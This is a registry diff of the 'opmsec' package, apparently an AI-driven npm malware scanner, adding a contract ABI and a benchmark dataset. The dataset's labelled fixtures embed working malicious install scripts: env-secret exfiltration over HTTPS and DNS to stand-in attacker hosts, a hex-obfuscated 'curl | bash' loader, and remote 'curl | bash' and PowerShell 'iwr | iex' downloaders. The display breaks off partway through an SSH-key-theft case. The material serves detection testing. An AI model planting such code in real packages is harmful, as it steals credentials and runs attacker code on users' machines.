opmsec 0.1.0 → 0.1.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (152)
  1. package/.env.example +23 -13
  2. package/.husky/pre-commit +1 -0
  3. package/README.md +256 -173
  4. package/bun.lock +4 -4
  5. package/docs/architecture/agents.mdx +77 -0
  6. package/docs/architecture/benchmarks.mdx +65 -0
  7. package/docs/architecture/overview.mdx +58 -0
  8. package/docs/architecture/scanner.mdx +53 -0
  9. package/docs/cli/audit.mdx +35 -0
  10. package/docs/cli/check.mdx +44 -0
  11. package/docs/cli/fix.mdx +49 -0
  12. package/docs/cli/info.mdx +44 -0
  13. package/docs/cli/install.mdx +71 -0
  14. package/docs/cli/push.mdx +99 -0
  15. package/docs/cli/register-agent.mdx +80 -0
  16. package/docs/cli/view.mdx +52 -0
  17. package/docs/concepts/multi-agent-consensus.mdx +58 -0
  18. package/docs/concepts/on-chain-registry.mdx +74 -0
  19. package/docs/concepts/security-model.mdx +76 -0
  20. package/docs/concepts/zk-agent-verification.mdx +82 -0
  21. package/docs/configuration.mdx +82 -0
  22. package/docs/contract/deployment.mdx +57 -0
  23. package/docs/contract/events.mdx +115 -0
  24. package/docs/contract/functions.mdx +220 -0
  25. package/docs/contract/overview.mdx +58 -0
  26. package/docs/favicon.svg +5 -0
  27. package/docs/introduction.mdx +43 -0
  28. package/docs/logo/dark.svg +5 -0
  29. package/docs/logo/light.svg +5 -0
  30. package/docs/mint.json +106 -0
  31. package/docs/quickstart.mdx +133 -0
  32. package/package.json +7 -6
  33. package/packages/cli/src/commands/author-view.tsx +9 -1
  34. package/packages/cli/src/commands/check.tsx +318 -0
  35. package/packages/cli/src/commands/fix.tsx +294 -0
  36. package/packages/cli/src/commands/install.tsx +501 -47
  37. package/packages/cli/src/commands/push.tsx +53 -22
  38. package/packages/cli/src/commands/register-agent.tsx +227 -0
  39. package/packages/cli/src/components/AgentScores.tsx +20 -6
  40. package/packages/cli/src/components/Hyperlink.tsx +30 -0
  41. package/packages/cli/src/components/ScanReport.tsx +3 -2
  42. package/packages/cli/src/index.tsx +44 -6
  43. package/packages/cli/src/services/avatar.ts +43 -6
  44. package/packages/cli/src/services/chainpatrol.ts +20 -17
  45. package/packages/cli/src/services/contract.ts +41 -8
  46. package/packages/cli/src/services/ens.ts +3 -5
  47. package/packages/cli/src/services/fileverse.ts +12 -13
  48. package/packages/cli/src/services/typosquat.ts +166 -0
  49. package/packages/cli/src/services/version.ts +156 -5
  50. package/packages/contracts/circuits/accuracy_verifier.circom +101 -0
  51. package/packages/contracts/contracts/OPMRegistry.sol +63 -0
  52. package/packages/contracts/scripts/deploy.ts +22 -3
  53. package/packages/core/src/abi.ts +221 -0
  54. package/packages/core/src/benchmarks.ts +450 -0
  55. package/packages/core/src/constants.ts +20 -0
  56. package/packages/core/src/index.ts +2 -0
  57. package/packages/core/src/model-rankings.ts +115 -0
  58. package/packages/core/src/prompt.ts +58 -0
  59. package/packages/core/src/types.ts +41 -0
  60. package/packages/core/src/utils.ts +142 -3
  61. package/packages/scanner/src/agents/base-agent.ts +13 -3
  62. package/packages/scanner/src/index.ts +5 -2
  63. package/packages/scanner/src/queue/memory-queue.ts +8 -3
  64. package/packages/scanner/src/services/benchmark-runner.ts +114 -0
  65. package/packages/scanner/src/services/contract-writer.ts +2 -3
  66. package/packages/scanner/src/services/fileverse.ts +26 -7
  67. package/packages/scanner/src/services/openrouter.ts +61 -4
  68. package/packages/scanner/src/services/report-formatter.ts +122 -3
  69. package/packages/scanner/src/services/zk-verifier.ts +118 -0
  70. package/packages/web/.next/BUILD_ID +1 -0
  71. package/packages/web/.next/app-build-manifest.json +26 -0
  72. package/packages/web/.next/app-path-routes-manifest.json +4 -0
  73. package/packages/web/.next/build-manifest.json +33 -0
  74. package/packages/web/.next/diagnostics/build-diagnostics.json +6 -0
  75. package/packages/web/.next/diagnostics/framework.json +1 -0
  76. package/packages/web/.next/export-marker.json +6 -0
  77. package/packages/web/.next/images-manifest.json +58 -0
  78. package/packages/web/.next/next-minimal-server.js.nft.json +1 -0
  79. package/packages/web/.next/next-server.js.nft.json +1 -0
  80. package/packages/web/.next/package.json +1 -0
  81. package/packages/web/.next/prerender-manifest.json +61 -0
  82. package/packages/web/.next/react-loadable-manifest.json +1 -0
  83. package/packages/web/.next/required-server-files.json +320 -0
  84. package/packages/web/.next/routes-manifest.json +53 -0
  85. package/packages/web/.next/server/app/_not-found/page.js +2 -0
  86. package/packages/web/.next/server/app/_not-found/page.js.nft.json +1 -0
  87. package/packages/web/.next/server/app/_not-found/page_client-reference-manifest.js +1 -0
  88. package/packages/web/.next/server/app/_not-found.html +1 -0
  89. package/packages/web/.next/server/app/_not-found.meta +8 -0
  90. package/packages/web/.next/server/app/_not-found.rsc +16 -0
  91. package/packages/web/.next/server/app/index.html +1 -0
  92. package/packages/web/.next/server/app/index.meta +7 -0
  93. package/packages/web/.next/server/app/index.rsc +20 -0
  94. package/packages/web/.next/server/app/page.js +2 -0
  95. package/packages/web/.next/server/app/page.js.nft.json +1 -0
  96. package/packages/web/.next/server/app/page_client-reference-manifest.js +1 -0
  97. package/packages/web/.next/server/app-paths-manifest.json +4 -0
  98. package/packages/web/.next/server/chunks/611.js +6 -0
  99. package/packages/web/.next/server/chunks/778.js +30 -0
  100. package/packages/web/.next/server/functions-config-manifest.json +4 -0
  101. package/packages/web/.next/server/interception-route-rewrite-manifest.js +1 -0
  102. package/packages/web/.next/server/middleware-build-manifest.js +1 -0
  103. package/packages/web/.next/server/middleware-manifest.json +6 -0
  104. package/packages/web/.next/server/middleware-react-loadable-manifest.js +1 -0
  105. package/packages/web/.next/server/next-font-manifest.js +1 -0
  106. package/packages/web/.next/server/next-font-manifest.json +1 -0
  107. package/packages/web/.next/server/pages/404.html +1 -0
  108. package/packages/web/.next/server/pages/500.html +1 -0
  109. package/packages/web/.next/server/pages/_app.js +1 -0
  110. package/packages/web/.next/server/pages/_app.js.nft.json +1 -0
  111. package/packages/web/.next/server/pages/_document.js +1 -0
  112. package/packages/web/.next/server/pages/_document.js.nft.json +1 -0
  113. package/packages/web/.next/server/pages/_error.js +19 -0
  114. package/packages/web/.next/server/pages/_error.js.nft.json +1 -0
  115. package/packages/web/.next/server/pages-manifest.json +6 -0
  116. package/packages/web/.next/server/server-reference-manifest.js +1 -0
  117. package/packages/web/.next/server/server-reference-manifest.json +1 -0
  118. package/packages/web/.next/server/webpack-runtime.js +1 -0
  119. package/packages/web/.next/static/2XIFCTTKVZwN_RsNE-Rrr/_buildManifest.js +1 -0
  120. package/packages/web/.next/static/2XIFCTTKVZwN_RsNE-Rrr/_ssgManifest.js +1 -0
  121. package/packages/web/.next/static/chunks/255-0dc49b7a6e8e5c05.js +1 -0
  122. package/packages/web/.next/static/chunks/4bd1b696-382748cc942d8a14.js +1 -0
  123. package/packages/web/.next/static/chunks/app/_not-found/page-0da542be7eb33a64.js +1 -0
  124. package/packages/web/.next/static/chunks/app/layout-28a489fb4398663f.js +1 -0
  125. package/packages/web/.next/static/chunks/app/page-e58ccdb78625bce6.js +1 -0
  126. package/packages/web/.next/static/chunks/framework-ac73abd125e371fe.js +1 -0
  127. package/packages/web/.next/static/chunks/main-app-dd261207182e5a23.js +1 -0
  128. package/packages/web/.next/static/chunks/main-ee293fa6aa18bdd1.js +1 -0
  129. package/packages/web/.next/static/chunks/pages/_app-7d307437aca18ad4.js +1 -0
  130. package/packages/web/.next/static/chunks/pages/_error-cb2a52f75f2162e2.js +1 -0
  131. package/packages/web/.next/static/chunks/polyfills-42372ed130431b0a.js +1 -0
  132. package/packages/web/.next/static/chunks/webpack-e1ae44446e7f7355.js +1 -0
  133. package/packages/web/.next/static/css/21d69157e271f2ab.css +3 -0
  134. package/packages/web/.next/trace +2 -0
  135. package/packages/web/.next/types/app/layout.ts +84 -0
  136. package/packages/web/.next/types/app/page.ts +84 -0
  137. package/packages/web/.next/types/cache-life.d.ts +141 -0
  138. package/packages/web/.next/types/package.json +1 -0
  139. package/packages/web/.next/types/routes.d.ts +57 -0
  140. package/packages/web/.next/types/validator.ts +61 -0
  141. package/packages/web/app/globals.css +75 -0
  142. package/packages/web/app/layout.tsx +26 -0
  143. package/packages/web/app/page.tsx +361 -0
  144. package/packages/web/bun.lock +300 -0
  145. package/packages/web/next-env.d.ts +6 -0
  146. package/packages/web/next.config.ts +5 -0
  147. package/packages/web/package.json +26 -0
  148. package/packages/web/postcss.config.mjs +8 -0
  149. package/packages/web/public/favicon.svg +5 -0
  150. package/packages/web/public/logo.svg +7 -0
  151. package/packages/web/tailwind.config.ts +48 -0
  152. package/packages/web/tsconfig.json +21 -0
@@ -625,5 +625,226 @@ export const OPM_REGISTRY_ABI = [
625
625
  "outputs": [],
626
626
  "stateMutability": "nonpayable",
627
627
  "type": "function"
628
+ },
629
+ {
630
+ "anonymous": false,
631
+ "inputs": [
632
+ {
633
+ "indexed": true,
634
+ "internalType": "address",
635
+ "name": "agent",
636
+ "type": "address"
637
+ },
638
+ {
639
+ "indexed": false,
640
+ "internalType": "string",
641
+ "name": "name",
642
+ "type": "string"
643
+ },
644
+ {
645
+ "indexed": false,
646
+ "internalType": "string",
647
+ "name": "model",
648
+ "type": "string"
649
+ },
650
+ {
651
+ "indexed": false,
652
+ "internalType": "bytes32",
653
+ "name": "systemPromptHash",
654
+ "type": "bytes32"
655
+ },
656
+ {
657
+ "indexed": false,
658
+ "internalType": "bytes32",
659
+ "name": "proofHash",
660
+ "type": "bytes32"
661
+ },
662
+ {
663
+ "indexed": false,
664
+ "internalType": "uint256",
665
+ "name": "timestamp",
666
+ "type": "uint256"
667
+ }
668
+ ],
669
+ "name": "AgentRegistered",
670
+ "type": "event"
671
+ },
672
+ {
673
+ "inputs": [
674
+ {
675
+ "internalType": "string",
676
+ "name": "name",
677
+ "type": "string"
678
+ },
679
+ {
680
+ "internalType": "string",
681
+ "name": "model",
682
+ "type": "string"
683
+ },
684
+ {
685
+ "internalType": "bytes32",
686
+ "name": "systemPromptHash",
687
+ "type": "bytes32"
688
+ },
689
+ {
690
+ "internalType": "bytes32",
691
+ "name": "proofHash",
692
+ "type": "bytes32"
693
+ }
694
+ ],
695
+ "name": "registerAgent",
696
+ "outputs": [],
697
+ "stateMutability": "nonpayable",
698
+ "type": "function"
699
+ },
700
+ {
701
+ "inputs": [
702
+ {
703
+ "internalType": "address",
704
+ "name": "agent",
705
+ "type": "address"
706
+ }
707
+ ],
708
+ "name": "getRegisteredAgent",
709
+ "outputs": [
710
+ {
711
+ "components": [
712
+ {
713
+ "internalType": "address",
714
+ "name": "agentAddress",
715
+ "type": "address"
716
+ },
717
+ {
718
+ "internalType": "string",
719
+ "name": "name",
720
+ "type": "string"
721
+ },
722
+ {
723
+ "internalType": "string",
724
+ "name": "model",
725
+ "type": "string"
726
+ },
727
+ {
728
+ "internalType": "bytes32",
729
+ "name": "systemPromptHash",
730
+ "type": "bytes32"
731
+ },
732
+ {
733
+ "internalType": "bytes32",
734
+ "name": "proofHash",
735
+ "type": "bytes32"
736
+ },
737
+ {
738
+ "internalType": "uint256",
739
+ "name": "registeredAt",
740
+ "type": "uint256"
741
+ },
742
+ {
743
+ "internalType": "bool",
744
+ "name": "active",
745
+ "type": "bool"
746
+ }
747
+ ],
748
+ "internalType": "struct OPMRegistry.RegisteredAgent",
749
+ "name": "",
750
+ "type": "tuple"
751
+ }
752
+ ],
753
+ "stateMutability": "view",
754
+ "type": "function"
755
+ },
756
+ {
757
+ "inputs": [],
758
+ "name": "getAgentCount",
759
+ "outputs": [
760
+ {
761
+ "internalType": "uint256",
762
+ "name": "",
763
+ "type": "uint256"
764
+ }
765
+ ],
766
+ "stateMutability": "view",
767
+ "type": "function"
768
+ },
769
+ {
770
+ "inputs": [
771
+ {
772
+ "internalType": "address",
773
+ "name": "agent",
774
+ "type": "address"
775
+ }
776
+ ],
777
+ "name": "revokeAgent",
778
+ "outputs": [],
779
+ "stateMutability": "nonpayable",
780
+ "type": "function"
781
+ },
782
+ {
783
+ "inputs": [
784
+ {
785
+ "internalType": "address",
786
+ "name": "",
787
+ "type": "address"
788
+ }
789
+ ],
790
+ "name": "registeredAgents",
791
+ "outputs": [
792
+ {
793
+ "internalType": "address",
794
+ "name": "agentAddress",
795
+ "type": "address"
796
+ },
797
+ {
798
+ "internalType": "string",
799
+ "name": "name",
800
+ "type": "string"
801
+ },
802
+ {
803
+ "internalType": "string",
804
+ "name": "model",
805
+ "type": "string"
806
+ },
807
+ {
808
+ "internalType": "bytes32",
809
+ "name": "systemPromptHash",
810
+ "type": "bytes32"
811
+ },
812
+ {
813
+ "internalType": "bytes32",
814
+ "name": "proofHash",
815
+ "type": "bytes32"
816
+ },
817
+ {
818
+ "internalType": "uint256",
819
+ "name": "registeredAt",
820
+ "type": "uint256"
821
+ },
822
+ {
823
+ "internalType": "bool",
824
+ "name": "active",
825
+ "type": "bool"
826
+ }
827
+ ],
828
+ "stateMutability": "view",
829
+ "type": "function"
830
+ },
831
+ {
832
+ "inputs": [
833
+ {
834
+ "internalType": "uint256",
835
+ "name": "",
836
+ "type": "uint256"
837
+ }
838
+ ],
839
+ "name": "agentRegistry",
840
+ "outputs": [
841
+ {
842
+ "internalType": "address",
843
+ "name": "",
844
+ "type": "address"
845
+ }
846
+ ],
847
+ "stateMutability": "view",
848
+ "type": "function"
628
849
  }
629
850
  ] as const;
@@ -0,0 +1,450 @@
1
+ import type { PackageMetadata, VersionHistoryEntry, SourceFile, KnownCVE } from './types';
2
+ import { buildUserPrompt } from './prompt';
3
+
4
/**
 * One labelled fixture in the scanner benchmark: a synthetic package
 * (metadata, version history, source files, known CVEs) paired with the
 * verdict an analysis of that package is expected to produce.
 */
export interface BenchmarkCase {
  /** Identifier of the case, e.g. `bench-001-clean-utility`. */
  id: string;
  /** Kind of scenario the fixture represents. */
  category:
    | 'clean'
    | 'typosquat'
    | 'malicious'
    | 'cve'
    | 'obfuscated'
    | 'exfiltration'
    | 'dependency_confusion';
  /** Human-readable summary of what the fixture contains. */
  description: string;
  /** Package manifest data for the fixture. */
  metadata: PackageMetadata;
  /** Release history entries for the fixture. */
  versionHistory: VersionHistoryEntry[];
  /** Source files (path, size, content) that make up the fixture. */
  sourceFiles: SourceFile[];
  /** Advisories attached to the fixture; empty when there are none. */
  knownCVEs: KnownCVE[];
  /** Ground truth that an analysis result is compared against. */
  expected: {
    /** Expected risk classification. */
    risk_level: 'LOW' | 'MEDIUM' | 'HIGH' | 'CRITICAL';
    /** Lowest acceptable risk score (inclusive in evaluateBenchmark). */
    min_risk_score: number;
    /** Highest acceptable risk score (inclusive in evaluateBenchmark). */
    max_risk_score: number;
    /**
     * Labels the analysis is expected to raise.
     * NOTE(review): evaluateBenchmark in this file does not read this field.
     */
    must_flag: string[];
  };
}
19
+
20
/**
 * Returns the built-in benchmark dataset: a hard-coded array of ten
 * BenchmarkCase fixtures (bench-001 .. bench-010). A new array literal is
 * built on every call.
 *
 * Categories covered:
 *   - clean:                bench-001, bench-005, bench-009 (expected LOW)
 *   - typosquat:            bench-002 (expected CRITICAL)
 *   - exfiltration:         bench-003 (expected CRITICAL)
 *   - obfuscated:           bench-004 (expected CRITICAL)
 *   - malicious:            bench-006, bench-010 (expected CRITICAL)
 *   - cve:                  bench-007 (expected HIGH)
 *   - dependency_confusion: bench-008 (expected CRITICAL)
 *
 * The `content` of every source file is fixture text held in a template
 * literal; this function only returns it and never executes it.
 *
 * In bench-004 the hex escapes are written with doubled backslashes, so the
 * fixture text itself contains the escape sequences. Decoded, they spell
 * "child_process", "exec", "curl http://", "192.168.1.1/shell" and " | bash".
 *
 * NOTE(review): the `size` values look nominal rather than exact byte counts
 * of `content` (e.g. a 20-character file is listed with size 80) - confirm
 * whether anything downstream relies on them being accurate.
 */
+ export function generateBenchmarkDataset(): BenchmarkCase[] {
21
+ return [
22
+ {
23
+ id: 'bench-001-clean-utility',
24
+ category: 'clean',
25
+ description: 'Legitimate utility: pure string helpers with no side effects',
26
+ metadata: {
27
+ name: 'string-utils-helper',
28
+ version: '2.1.0',
29
+ description: 'Lightweight string manipulation utilities',
30
+ author: 'verified-dev',
31
+ license: 'MIT',
32
+ dependencies: {},
33
+ scripts: {},
34
+ },
35
+ versionHistory: [
36
+ { version: '2.0.0', published: '2024-06-01', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+200B', newMaintainer: false },
37
+ { version: '2.1.0', published: '2024-09-15', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+150B', newMaintainer: false },
38
+ ],
39
+ sourceFiles: [
40
+ {
41
+ path: 'index.js',
42
+ size: 420,
43
+ content: `"use strict";
44
+ module.exports.capitalize = (s) => s.charAt(0).toUpperCase() + s.slice(1);
45
+ module.exports.camelCase = (s) => s.replace(/-([a-z])/g, (_, c) => c.toUpperCase());
46
+ module.exports.kebabCase = (s) => s.replace(/([A-Z])/g, '-$1').toLowerCase();
47
+ module.exports.truncate = (s, len) => s.length > len ? s.slice(0, len) + '...' : s;`,
48
+ },
49
+ ],
50
+ knownCVEs: [],
51
+ expected: { risk_level: 'LOW', min_risk_score: 0, max_risk_score: 20, must_flag: [] },
52
+ },
53
+
54
+ {
55
+ id: 'bench-002-typosquat-lodash',
56
+ category: 'typosquat',
57
+ description: 'Typosquat of lodash: "lodahs" with credential exfiltration in postinstall',
58
+ metadata: {
59
+ name: 'lodahs',
60
+ version: '4.17.21',
61
+ description: 'Lodash modular utilities',
62
+ author: 'unknown',
63
+ license: 'MIT',
64
+ dependencies: {},
65
+ scripts: { postinstall: 'node setup.js' },
66
+ },
67
+ versionHistory: [
68
+ { version: '4.17.21', published: '2025-01-03', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
69
+ ],
70
+ sourceFiles: [
71
+ {
72
+ path: 'setup.js',
73
+ size: 310,
74
+ content: `const https = require('https');
75
+ const os = require('os');
76
+ const data = JSON.stringify({
77
+ h: os.hostname(), u: os.userInfo().username,
78
+ e: Object.keys(process.env).filter(k => k.match(/TOKEN|KEY|SECRET|PASS/i)).map(k => k + '=' + process.env[k])
79
+ });
80
+ const req = https.request({ hostname: 'collect.evil-analytics.xyz', port: 443, path: '/d', method: 'POST',
81
+ headers: { 'Content-Type': 'application/json' } }, () => {});
82
+ req.write(data); req.end();`,
83
+ },
84
+ {
85
+ path: 'index.js',
86
+ size: 50,
87
+ content: `module.exports = require('lodash');`,
88
+ },
89
+ ],
90
+ knownCVEs: [],
91
+ expected: { risk_level: 'CRITICAL', min_risk_score: 80, max_risk_score: 100, must_flag: ['typosquat', 'exfiltration', 'postinstall'] },
92
+ },
93
+
94
+ {
95
+ id: 'bench-003-env-exfiltration',
96
+ category: 'exfiltration',
97
+ description: 'Package that silently exfiltrates environment variables on import',
98
+ metadata: {
99
+ name: 'fast-config-loader',
100
+ version: '1.0.0',
101
+ description: 'Fast configuration loading for Node.js',
102
+ author: 'anon-publisher',
103
+ license: 'ISC',
104
+ dependencies: {},
105
+ scripts: {},
106
+ },
107
+ versionHistory: [
108
+ { version: '1.0.0', published: '2025-02-20', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
109
+ ],
110
+ sourceFiles: [
111
+ {
112
+ path: 'index.js',
113
+ size: 480,
114
+ content: `const http = require('http');
115
+ function loadConfig(path) { return require(path); }
116
+ const _e = Buffer.from(JSON.stringify(process.env)).toString('base64');
117
+ const _o = { hostname: '198.51.100.42', port: 8080, path: '/api/telemetry', method: 'POST',
118
+ headers: { 'Content-Type': 'text/plain', 'X-Session': Date.now().toString(36) } };
119
+ try { const r = http.request(_o, () => {}); r.write(_e); r.end(); } catch(e) {}
120
+ module.exports = { loadConfig };`,
121
+ },
122
+ ],
123
+ knownCVEs: [],
124
+ expected: { risk_level: 'CRITICAL', min_risk_score: 85, max_risk_score: 100, must_flag: ['exfiltration', 'network_calls', 'env_variables'] },
125
+ },
126
+
127
+ {
128
+ id: 'bench-004-obfuscated-payload',
129
+ category: 'obfuscated',
130
+ description: 'Heavily obfuscated code hiding a reverse shell',
131
+ metadata: {
132
+ name: 'perf-monitor-lite',
133
+ version: '0.9.1',
134
+ description: 'Lightweight performance monitoring',
135
+ author: 'dev-tools-org',
136
+ license: 'MIT',
137
+ dependencies: {},
138
+ scripts: { preinstall: 'node bootstrap.js' },
139
+ },
140
+ versionHistory: [
141
+ { version: '0.9.0', published: '2024-12-01', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
142
+ { version: '0.9.1', published: '2025-01-10', depsChanged: 'none', filesChanged: 'major', sizeDelta: '+15KB', newMaintainer: false },
143
+ ],
144
+ sourceFiles: [
145
+ {
146
+ path: 'bootstrap.js',
147
+ size: 650,
148
+ content: `var _0x4f2a = ['\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73',
149
+ '\\x65\\x78\\x65\\x63', '\\x63\\x75\\x72\\x6c\\x20\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f'];
150
+ (function() { var cp = require(_0x4f2a[0]);
151
+ cp[_0x4f2a[1]](_0x4f2a[2] + '\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x2e\\x31\\x2f\\x73\\x68\\x65\\x6c\\x6c' +
152
+ '\\x20\\x7c\\x20\\x62\\x61\\x73\\x68'); })();`,
153
+ },
154
+ {
155
+ path: 'index.js',
156
+ size: 100,
157
+ content: `module.exports.measure = (fn) => { const s = Date.now(); fn(); return Date.now() - s; };`,
158
+ },
159
+ ],
160
+ knownCVEs: [],
161
+ expected: { risk_level: 'CRITICAL', min_risk_score: 90, max_risk_score: 100, must_flag: ['obfuscated', 'process_spawn', 'preinstall'] },
162
+ },
163
+
164
+ {
165
+ id: 'bench-005-clean-math',
166
+ category: 'clean',
167
+ description: 'Legitimate math library with zero dependencies',
168
+ metadata: {
169
+ name: 'tiny-math-ops',
170
+ version: '3.2.1',
171
+ description: 'Tiny math operations library',
172
+ author: 'math-community',
173
+ license: 'MIT',
174
+ dependencies: {},
175
+ scripts: { test: 'node test.js' },
176
+ },
177
+ versionHistory: [
178
+ { version: '3.1.0', published: '2024-03-10', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+100B', newMaintainer: false },
179
+ { version: '3.2.0', published: '2024-07-20', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+80B', newMaintainer: false },
180
+ { version: '3.2.1', published: '2024-11-05', depsChanged: 'none', filesChanged: 'patch', sizeDelta: '+20B', newMaintainer: false },
181
+ ],
182
+ sourceFiles: [
183
+ {
184
+ path: 'index.js',
185
+ size: 350,
186
+ content: `"use strict";
187
+ exports.clamp = (n, min, max) => Math.min(Math.max(n, min), max);
188
+ exports.lerp = (a, b, t) => a + (b - a) * t;
189
+ exports.roundTo = (n, d) => { const m = Math.pow(10, d); return Math.round(n * m) / m; };
190
+ exports.isPrime = (n) => { if (n < 2) return false; for (let i = 2; i <= Math.sqrt(n); i++) if (n % i === 0) return false; return true; };
191
+ exports.factorial = (n) => n <= 1 ? 1 : n * exports.factorial(n - 1);`,
192
+ },
193
+ ],
194
+ knownCVEs: [],
195
+ expected: { risk_level: 'LOW', min_risk_score: 0, max_risk_score: 15, must_flag: [] },
196
+ },
197
+
198
+ {
199
+ id: 'bench-006-postinstall-shell',
200
+ category: 'malicious',
201
+ description: 'Package with postinstall that downloads and executes remote script',
202
+ metadata: {
203
+ name: 'react-dev-toolkit',
204
+ version: '1.0.2',
205
+ description: 'Developer tools for React applications',
206
+ author: 'anonymous',
207
+ license: 'MIT',
208
+ dependencies: {},
209
+ scripts: { postinstall: 'node scripts/init.js' },
210
+ },
211
+ versionHistory: [
212
+ { version: '1.0.0', published: '2025-03-01', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
213
+ { version: '1.0.2', published: '2025-03-02', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+2KB', newMaintainer: false },
214
+ ],
215
+ sourceFiles: [
216
+ {
217
+ path: 'scripts/init.js',
218
+ size: 280,
219
+ content: `const { execSync } = require('child_process');
220
+ const os = require('os');
221
+ const p = os.platform();
222
+ try {
223
+ if (p === 'linux' || p === 'darwin') {
224
+ execSync('curl -s https://cdn-pkg-setup.com/init.sh | bash', { stdio: 'ignore' });
225
+ } else {
226
+ execSync('powershell -c "iwr https://cdn-pkg-setup.com/init.ps1 | iex"', { stdio: 'ignore' });
227
+ }
228
+ } catch(e) {}`,
229
+ },
230
+ {
231
+ path: 'index.js',
232
+ size: 80,
233
+ content: `module.exports = {};`,
234
+ },
235
+ ],
236
+ knownCVEs: [],
237
+ expected: { risk_level: 'CRITICAL', min_risk_score: 85, max_risk_score: 100, must_flag: ['postinstall', 'process_spawn', 'network_calls'] },
238
+ },
239
+
240
+ {
241
+ id: 'bench-007-known-cve',
242
+ category: 'cve',
243
+ description: 'Package with known prototype pollution CVE',
244
+ metadata: {
245
+ name: 'deep-object-merge',
246
+ version: '1.3.0',
247
+ description: 'Deep merge objects recursively',
248
+ author: 'obj-utils',
249
+ license: 'MIT',
250
+ dependencies: {},
251
+ scripts: {},
252
+ },
253
+ versionHistory: [
254
+ { version: '1.2.0', published: '2024-01-15', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+50B', newMaintainer: false },
255
+ { version: '1.3.0', published: '2024-06-20', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+100B', newMaintainer: false },
256
+ ],
257
+ sourceFiles: [
258
+ {
259
+ path: 'index.js',
260
+ size: 300,
261
+ content: `function deepMerge(target, source) {
262
+ for (const key in source) {
263
+ if (source[key] && typeof source[key] === 'object') {
264
+ if (!target[key]) target[key] = {};
265
+ deepMerge(target[key], source[key]);
266
+ } else {
267
+ target[key] = source[key];
268
+ }
269
+ }
270
+ return target;
271
+ }
272
+ module.exports = deepMerge;`,
273
+ },
274
+ ],
275
+ knownCVEs: [
276
+ { id: 'GHSA-xxxx-yyyy-zzzz', summary: 'Prototype pollution via __proto__ in deep-object-merge allows attackers to inject properties into Object.prototype' },
277
+ ],
278
+ expected: { risk_level: 'HIGH', min_risk_score: 60, max_risk_score: 100, must_flag: ['prototype_pollution', 'cve'] },
279
+ },
280
+
281
+ {
282
+ id: 'bench-008-dependency-confusion',
283
+ category: 'dependency_confusion',
284
+ description: 'Public package shadowing internal @company scope with data exfiltration',
285
+ metadata: {
286
+ name: 'internal-auth-service',
287
+ version: '99.0.0',
288
+ description: 'Authentication service utilities',
289
+ author: 'unknown',
290
+ license: 'ISC',
291
+ dependencies: {},
292
+ scripts: { preinstall: 'node telemetry.js' },
293
+ },
294
+ versionHistory: [
295
+ { version: '99.0.0', published: '2025-02-28', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
296
+ ],
297
+ sourceFiles: [
298
+ {
299
+ path: 'telemetry.js',
300
+ size: 200,
301
+ content: `const dns = require('dns');
302
+ const os = require('os');
303
+ const pkg = require('./package.json');
304
+ const data = Buffer.from(JSON.stringify({ h: os.hostname(), p: pkg.name, v: pkg.version })).toString('hex');
305
+ dns.resolve(\`\${data.slice(0,60)}.exfil.attacker-domain.com\`, () => {});`,
306
+ },
307
+ {
308
+ path: 'index.js',
309
+ size: 40,
310
+ content: `module.exports = {};`,
311
+ },
312
+ ],
313
+ knownCVEs: [],
314
+ expected: { risk_level: 'CRITICAL', min_risk_score: 80, max_risk_score: 100, must_flag: ['dependency_confusion', 'exfiltration', 'preinstall'] },
315
+ },
316
+
317
+ {
318
+ id: 'bench-009-clean-validator',
319
+ category: 'clean',
320
+ description: 'Legitimate input validation library with established history',
321
+ metadata: {
322
+ name: 'form-input-check',
323
+ version: '5.0.2',
324
+ description: 'Input validation and sanitization',
325
+ author: 'validation-team',
326
+ license: 'MIT',
327
+ dependencies: {},
328
+ scripts: { test: 'jest' },
329
+ },
330
+ versionHistory: [
331
+ { version: '4.9.0', published: '2023-11-01', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+200B', newMaintainer: false },
332
+ { version: '5.0.0', published: '2024-03-15', depsChanged: 'none', filesChanged: 'major', sizeDelta: '+1KB', newMaintainer: false },
333
+ { version: '5.0.2', published: '2024-08-10', depsChanged: 'none', filesChanged: 'patch', sizeDelta: '+50B', newMaintainer: false },
334
+ ],
335
+ sourceFiles: [
336
+ {
337
+ path: 'index.js',
338
+ size: 500,
339
+ content: `"use strict";
340
+ const EMAIL_RE = /^[^\\s@]+@[^\\s@]+\\.[^\\s@]+$/;
341
+ const URL_RE = /^https?:\\/\\/[^\\s/$.?#].[^\\s]*$/;
342
+ exports.isEmail = (v) => typeof v === 'string' && EMAIL_RE.test(v);
343
+ exports.isURL = (v) => typeof v === 'string' && URL_RE.test(v);
344
+ exports.isNumeric = (v) => !isNaN(parseFloat(v)) && isFinite(v);
345
+ exports.sanitize = (v) => String(v).replace(/[<>&"']/g, (c) => ({ '<':'&lt;', '>':'&gt;', '&':'&amp;', '"':'&quot;', "'":'&#39;' }[c]));
346
+ exports.minLength = (v, n) => typeof v === 'string' && v.length >= n;
347
+ exports.maxLength = (v, n) => typeof v === 'string' && v.length <= n;`,
348
+ },
349
+ ],
350
+ knownCVEs: [],
351
+ expected: { risk_level: 'LOW', min_risk_score: 0, max_risk_score: 20, must_flag: [] },
352
+ },
353
+
354
+ {
355
+ id: 'bench-010-fs-read-exfil',
356
+ category: 'malicious',
357
+ description: 'Package that reads SSH keys and sends them to a remote server',
358
+ metadata: {
359
+ name: 'ssh-key-manager',
360
+ version: '2.0.0',
361
+ description: 'Manage SSH keys easily',
362
+ author: 'unknown-dev',
363
